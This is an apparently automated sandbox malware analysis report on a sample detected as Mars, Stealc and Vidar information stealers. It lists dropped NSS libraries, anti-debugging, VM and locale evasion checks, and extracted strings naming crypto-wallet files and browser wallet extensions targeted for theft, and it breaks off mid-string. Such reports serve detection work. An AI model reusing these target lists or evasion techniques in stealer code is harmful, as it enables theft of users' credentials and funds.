Source:	Binary string: mozglue.pdbP source: i3NmF0obCm.exe, 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: i3NmF0obCm.exe, 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

0_2_00EF76E0

PE file contains sections with non-standard names

Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF8EE5 push ecx; ret		0_2_00EF8EF8
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C50B536 push ecx; ret		0_2_6C50B549

Drops PE files

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

0_2_00EF76E0

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

API coverage: 6.2 %

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEEDE0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00EEEDE0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EED1F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_00EED1F0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF3560 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00EF3560
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEB630 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_00EEB630
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EE1600 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00EE1600
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEDB90 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_00EEDB90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF2B70 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00EF2B70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEE450 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_00EEE450
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF31E0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00EF31E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EED570 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00EED570
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF2630 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00EF2630

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF5DA0 GetSystemInfo,wsprintfA,

0_2_00EF5DA0

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF8BFD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00EF8BFD

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

0_2_00EF76E0

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF75D0 mov eax, dword ptr fs:[00000030h]

0_2_00EF75D0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EE6CD0 memset,RegOpenKeyExA,RegEnumValueA,StrStrA,GetProcessHeap,HeapFree,task,

0_2_00EE6CD0

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EFB5E7 SetUnhandledExceptionFilter,	0_2_00EFB5E7
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF8BFD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00EF8BFD
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF936E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00EF936E
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C50B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6C50B66C
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C50B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C50B1F7
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6BAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C6BAC62

HIPS / PFW / Operating System Protection Evasion

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF7510 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00EF7510

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_6C50B341 cpuid

0_2_6C50B341

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00EF5A60

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF5850 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,

0_2_00EF5850

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF5720 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_00EF5720

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF5900 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_00EF5900

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: i3NmF0obCm.exe, type: SAMPLE
Source: Yara match	File source: 0.2.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1660747391.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: i3NmF0obCm.exe PID: 6304, type: MEMORYSTR
Source: Yara match	File source: decrypted.binstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: i3NmF0obCm.exe, type: SAMPLE
Source: Yara match	File source: 0.2.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1660747391.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: i3NmF0obCm.exe PID: 6304, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MetaMask\|djclckkglechooblngghdinmeemkbgci\|1\|0\|0\|MetaMask\|ejbalbakoplchlghecdalmeeeajnimhm\|1\|0\|0\|MetaMask\|nkbihfbeogaeaoehlefnkodbefgpgknn\|1\|0\|0\|TronLink\|ibnejdfjmmkpcnlpebklmnkoeoihofec\|1\|0\|0\|Binance Wallet\|fhbohimaelbohpjbbldcngcnapndodjp\|1\|0\|0\|Yoroi\|ffnbelfdoeiohenkjibnmadjiehjhajb\|1\|0\|0\|Coinbase Wallet extension\|hnfanknocfeofbddgcijnmhnfnkdnaad\|1\|0\|1\|Guarda\|hpglfhgfnhbgpjdenjgmdgoeiappafln\|1\|0\|0\|Jaxx Liberty\|cjelfplplebdjjenllpjcblmjkfcffne\|1\|0\|0\|iWallet\|kncchdigobghenbbaddojjnnaogfppfj\|1\|0\|0\|MEW CX\|nlbmnnijcnlegkjjpcfjclmcfggfefdm\|1\|0\|0\|GuildWallet\|nanjmdknhkinifnkgdcggcfnhdaammmj\|1\|0\|0\|Ronin Wallet\|fnjhmkhhmkbjkkabndcnnogagogbneec\|1\|0\|0\|NeoLine\|cphhlgmgameodnhkjdmkpanlelnlohao\|1\|0\|0\|CLV Wallet\|nhnkbkgjikgcigadomkphalanndcapjk\|1\|0\|0\|Liquality Wallet\|kpfopkelmapcoipemfendmdcghnegimn\|1\|0\|0\|Terra Station Wallet\|aiifbnbfobpmeekipheeijimdpnlpgpp\|1\|0\|0\|Keplr\|dmkamcknogkgcdfhhbddcghachkejeap\|1\|0\|0\|Sollet\|fhmfendgdocmcbmfikdcogofphimnkno\|1\|0\|0\|Auro Wallet(Mina Protocol)\|cnmamaachppnkjgnildpdmkaakejnhae\|1\|0\|0\|Polymesh Wallet\|jojhfeoedkpkglbfimdfabpdfjaoolaf\|1\|0\|0\|ICONex\|flpiciilemghbmfalicajoolhkkenfel\|1\|0\|0\|Coin98 Wallet\|aeachknmefphepccionboohckonoeemg\|1\|0\|0\|EVER Wallet\|cgeeodpfagjceefieflmdfphplkenlfk\|1\|0\|0\|KardiaChain Wallet\|pdadjkfkgcafgbceimcpbkalnfnepbnk\|1\|0\|0\|Rabby\|acmacodkjbdgmoleebolmdjonilkdbch\|1\|0\|0\|Phantom\|bfnaelmomeimhlpmgjnjophhpkkoljpa\|1\|0\|0\|Brave Wallet\|odbfpeeihdkbihmopkbjmoonfanlbfcl\|1\|0\|0\|Oxygen\|fhilaheimglignddkjgofkcbgekhenbh\|1\|0\|0\|Pali Wallet\|mgffkfbidihjpoaomajlbgchddlicgpn\|1\|0\|0\|BOLT X\|aodkkagnadcbobfpggfnjeongemjbjca\|1\|0\|0\|XDEFI Wallet\|hmeobnfnfcmdkdcmlblgagmfpfboieaf\|1\|0\|0\|Nami\|lpfcbjknijpeeillifnkikgncikgfhdo\|1\|0\|0\|Maiar DeFi Wallet\|dngmlblcodfobpdpecaadgfbcggfjfnm\|1\|0\|0\|Keeper 